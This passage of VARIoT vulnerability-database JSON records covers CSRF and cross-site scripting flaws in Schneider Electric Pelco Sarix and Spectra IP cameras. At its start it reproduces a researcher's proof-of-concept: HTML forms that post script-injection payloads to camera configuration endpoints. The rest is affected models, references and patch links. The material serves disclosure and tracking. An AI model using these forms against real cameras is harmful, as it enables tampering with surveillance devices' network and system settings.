type=\"hidden\" name=\"inner\u0026#95;auth\" value=\"CHAP\" /\u003e\n \u003cinput type=\"hidden\" name=\"username\" value=\u0027\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"password\" value=\"blah\" /\u003e\n \u003cinput type=\"hidden\" name=\"anonymous\u0026#95;id\" value=\"\u0026#13;\" /\u003e\n \u003cinput type=\"hidden\" name=\"ca\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"client\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\u0026#95;password\" value=\"test\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:\n-------------------------------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"hostname\" value=\u0027\"\u003e\u003cscript\u003ealert(2)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"http\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(3)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"rtsp\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"dhcp\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"ip\u0026#95;address\" value=\u0027\"\u003e\u003cscript\u003ealert(5)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"subnet\u0026#95;mask\" value=\u0027\"\u003e\u003cscript\u003ealert(6)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"gateway\" value=\u0027\"\u003e\u003cscript\u003ealert(7)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"nameservers\" value=\u0027\"\u003e\u003cscript\u003ealert(8)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on version parameter:\n------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/snmp/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"version\" value=\u0027\";alert(9)//\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;community\u0026#95;string\" value=\"public\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;receiver\u0026#95;address\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;trap\u0026#95;community\u0026#95;string\" value=\"trapbratce\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:\n----------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/system/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"device\u0026#95;name\" value=\u0027ZSL\"\u003e\u003cscript\u003ealert(10)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;leds\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"smtp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(11)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\u0026#95;from\u0026#95;dhcp\" value=\"false\" /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\" value=\"\u0027;alert(12)//\u0027\" /\u003e\n \u003cinput type=\"hidden\" name=\"region\" value=\"Macedonia\u0027;alert(13)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"zone\" value=\"Kumanovo\u0027;alert(14)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;time\u0026#95;overlay\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;name\u0026#95;overlay\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"position\" value=\"topright\" /\u003e\n \u003cinput type=\"hidden\" name=\"date\u0026#95;format\" value=\"0\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nXSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:\n--------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/events/handlers/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"id\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;sentinel\" value=\"relay\u0026#95;sentinel\" /\u003e\n \u003cinput type=\"hidden\" name=\"name\" value=\u0027\"\u003e\u003cscript\u003ealert(15)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"type\" value=\"Ftp\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;to\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;from\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;subject\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;message\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\u0026#95;scale\" value=\"K\" /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(16)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;username\" value=\u0027\"\u003e\u003cscript\u003ealert(17)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;password\" value=\u0027\"\u003e\u003cscript\u003ealert(18)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;base\u0026#95;path\" value=\u0027\"\u003e\u003cscript\u003ealert(19)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;bankName\" value=\"GPIO\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;index\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;on\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;off\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;pulse\u0026#95;count\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;start0\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;stop0\" value=\"\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7827"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015520"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16260"
},
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "PACKETSTORM",
"id": "143313"
}
],
"trust": 2.97
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/pelco_rce.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.zeroscience.mk/codes/pelco_xss.txt",
"trust": 0.1,
"type": "poc"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7827",
"trust": 3.2
},
{
"db": "SCHNEIDER",
"id": "SEVD-2019-045-03",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015520",
"trust": 0.8
},
{
"db": "EXPLOIT-DB",
"id": "42307",
"trust": 0.7
},
{
"db": "EXPLOITDB",
"id": "42307",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2019-16260",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201905-910",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "143313",
"trust": 0.2
},
{
"db": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "143315",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7829",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070080",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42309",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070075",
"trust": 0.1
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16260"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015520"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-910"
},
{
"db": "NVD",
"id": "CVE-2018-7827"
}
]
},
"id": "VAR-201905-1051",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16260"
}
],
"trust": 2.3
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16260"
}
]
},
"last_update_date": "2025-01-30T20:39:28.363000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SEVD-2019-045-03",
"trust": 0.8,
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-045-03/"
},
{
"title": "Patch for SchneiderElectric1stGen.PelcoSarixEnhancedCamera and SpectraEnhancedPTZCamera Cross-Site Request Forgery Vulnerability (CNVD-2019-16260)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/162755"
},
{
"title": "Schneider Electric 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera Fixes for cross-site request forgery vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=92888"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16260"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015520"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-910"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015520"
},
{
"db": "NVD",
"id": "CVE-2018-7827"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7827"
},
{
"trust": 0.9,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7827"
},
{
"trust": 0.7,
"url": "https://www.exploit-db.com/exploits/42307/"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42309/"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070080"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143315"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129667"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7829"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070075"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143313"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129665"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/dot1x/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/system/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/events/handlers/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/snmp/update\""
},
{
"trust": 0.1,
"url": "https://www.pelco.com"
},
{
"trust": 0.1,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2017-5415.php"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16260"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015520"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-910"
},
{
"db": "NVD",
"id": "CVE-2018-7827"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16260"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015520"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-910"
},
{
"db": "NVD",
"id": "CVE-2018-7827"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-06-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16260"
},
{
"date": "2019-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015520"
},
{
"date": "2017-07-11T04:32:15",
"db": "PACKETSTORM",
"id": "143313"
},
{
"date": "2019-05-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-910"
},
{
"date": "2019-05-22T20:29:01.277000",
"db": "NVD",
"id": "CVE-2018-7827"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-06-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16260"
},
{
"date": "2019-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015520"
},
{
"date": "2020-02-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-910"
},
{
"date": "2024-11-21T04:12:48.327000",
"db": "NVD",
"id": "CVE-2018-7827"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-910"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015520"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-910"
}
],
"trust": 0.6
}
}
VAR-201905-1040
Vulnerability from variot - Updated: 2025-01-30 19:43A Cross-Site Request Forgery (CSRF) vulnerability exists in the 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera when an authenticated user clicks a specially crafted malicious link while logged into the camera. Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectricPelcoSarix/SpectraCameras has multiple cross-site scripting vulnerabilities that an attacker can exploit to execute arbitrary HTML and script code. SchneiderElectric1stGenPelcoSarixEnhancedCamera and SchneiderElectricSpectraEnhancedPTZCamera are products of Schneider Electric. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras. The Schneider Electric SpectraEnhancedPTZCamera is a series of spherical IP cameras. The vulnerability stems from the fact that the web application did not fully verify that the request came from a trusted user. An attacker could exploit the vulnerability to send an unexpected request to the server through an affected client. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities
Vendor: Schneider Electric SE Product web page: https://www.pelco.com Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)
Summary: Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. From our industry-leading fixed and high-speed IP cameras to panoramic, thermal imaging, explosionproof and more, we offer a camera for any environment, any lighting condition and any application. When nothing but the best will do. SarixaC/ Enhanced Range cameras provide the most robust feature-set for your mission-critical applications. With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image in difficult lighting conditions such as a combination of bright areas, shaded areas, and intense light. Designed with superior reliability, fault tolerance, and processing speed, these rugged fixed IP cameras ensure you always get the video that you need.
Desc: Pelco cameras suffer from multiple dom-based, stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user.
Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) Lighttpd/1.4.28 PHP/5.3.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2017-5415 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php
07.04.2017
--
CSRF/XSS on username parameter:
history.pushState('', '', '/')CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:
history.pushState('', '', '/')CSRF/XSS on version parameter:
history.pushState('', '', '/')CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:
history.pushState('', '', '/')XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:
history.pushState('', '', '/') Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201905-1040",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "imes19-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe11",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220l",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
},
{
"model": "ime3122-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixes1",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ixe21",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1es",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1s",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ei",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-b1p",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime219-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1ep",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-b1i",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime3122-1vs",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "imes19-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime119-1vi",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "ime319-1vp",
"scope": "lt",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.2.3.0"
},
{
"model": "d6220",
"scope": "gte",
"trust": 1.0,
"vendor": "schneider electric",
"version": "2.11"
